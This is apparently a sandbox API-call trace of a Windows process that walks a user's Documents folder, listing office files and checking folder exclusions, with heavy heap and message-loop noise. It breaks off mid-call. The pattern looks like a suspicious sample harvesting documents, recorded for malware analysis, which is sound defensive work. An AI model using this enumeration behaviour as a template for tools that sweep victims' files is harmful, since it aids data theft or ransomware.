1 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d50 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.375] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60d02d0, ftCreationTime.dwHighDateTime=0x1d5e110, ftLastAccessTime.dwLowDateTime=0xa4489aa0, ftLastAccessTime.dwHighDateTime=0x1d5e417, ftLastWriteTime.dwLowDateTime=0xa4489aa0, ftLastWriteTime.dwHighDateTime=0x1d5e417, nFileSizeHigh=0x0, nFileSizeLow=0x137a4, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Im NPo61DTLm5sBx.pps", cAlternateFileName="IMNPO6~1.PPS")) returned 1 [0157.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.375] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.375] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.376] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d50 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.376] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.376] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.377] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.377] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5249d40, ftCreationTime.dwHighDateTime=0x1d5d056, ftLastAccessTime.dwLowDateTime=0x45d595f0, ftLastAccessTime.dwHighDateTime=0x1d5921d, ftLastWriteTime.dwLowDateTime=0x45d595f0, ftLastWriteTime.dwHighDateTime=0x1d5921d, nFileSizeHigh=0x0, nFileSizeLow=0x1880e, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="j0tJZ4pqz2gw.docx", cAlternateFileName="J0TJZ4~1.DOC")) returned 1 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.377] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.377] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.378] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a79df10, ftCreationTime.dwHighDateTime=0x1d57a75, ftLastAccessTime.dwLowDateTime=0x111572f0, ftLastAccessTime.dwHighDateTime=0x1d59c76, ftLastWriteTime.dwLowDateTime=0x111572f0, ftLastWriteTime.dwHighDateTime=0x1d59c76, nFileSizeHigh=0x0, nFileSizeLow=0xa7c0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="k55L_7uM1tYjpSGA.pptx", cAlternateFileName="K55L_7~1.PPT")) returned 1 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.380] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c841e50, ftCreationTime.dwHighDateTime=0x1d5e04c, ftLastAccessTime.dwLowDateTime=0xe06b1270, ftLastAccessTime.dwHighDateTime=0x1d5e32b, ftLastWriteTime.dwLowDateTime=0xe06b1270, ftLastWriteTime.dwHighDateTime=0x1d5e32b, nFileSizeHigh=0x0, nFileSizeLow=0x8f0a, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="kQVkybnJLUTO.ods", cAlternateFileName="KQVKYB~1.ODS")) returned 1 [0157.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bdfbc0, ftCreationTime.dwHighDateTime=0x1d593aa, ftLastAccessTime.dwLowDateTime=0x189ff370, ftLastAccessTime.dwHighDateTime=0x1d5ac29, ftLastWriteTime.dwLowDateTime=0x189ff370, ftLastWriteTime.dwHighDateTime=0x1d5ac29, nFileSizeHigh=0x0, nFileSizeLow=0x4d63, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="KuxYygUpCCsKE_KnyRa.pptx", cAlternateFileName="KUXYYG~1.PPT")) returned 1 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.380] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc61770, ftCreationTime.dwHighDateTime=0x1d5dafd, ftLastAccessTime.dwLowDateTime=0xac00e9c0, ftLastAccessTime.dwHighDateTime=0x1d5da1f, ftLastWriteTime.dwLowDateTime=0xac00e9c0, ftLastWriteTime.dwHighDateTime=0x1d5da1f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="KwBYebiNhHcjLML", cAlternateFileName="KWBYEB~1")) returned 1 [0157.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.381] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.381] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.381] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.381] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML", cchCount1=15, lpString2="AppData", cchCount2=7) returned 3 [0157.381] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.381] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.381] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.381] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.381] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc61770, ftCreationTime.dwHighDateTime=0x1d5dafd, ftLastAccessTime.dwLowDateTime=0xac00e9c0, ftLastAccessTime.dwHighDateTime=0x1d5da1f, ftLastWriteTime.dwLowDateTime=0xac00e9c0, ftLastWriteTime.dwHighDateTime=0x1d5da1f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.386] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc61770, ftCreationTime.dwHighDateTime=0x1d5dafd, ftLastAccessTime.dwLowDateTime=0xac00e9c0, ftLastAccessTime.dwHighDateTime=0x1d5da1f, ftLastWriteTime.dwLowDateTime=0xac00e9c0, ftLastWriteTime.dwHighDateTime=0x1d5da1f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.387] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bbbac0, ftCreationTime.dwHighDateTime=0x1d5e544, ftLastAccessTime.dwLowDateTime=0xb4ebf4e0, ftLastAccessTime.dwHighDateTime=0x1d5debf, ftLastWriteTime.dwLowDateTime=0xb4ebf4e0, ftLastWriteTime.dwHighDateTime=0x1d5debf, nFileSizeHigh=0x0, nFileSizeLow=0x4587, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="DS7b8_ Jws.docx", cAlternateFileName="DS7B8_~1.DOC")) returned 1 [0157.387] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.387] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.387] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e10 [0157.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 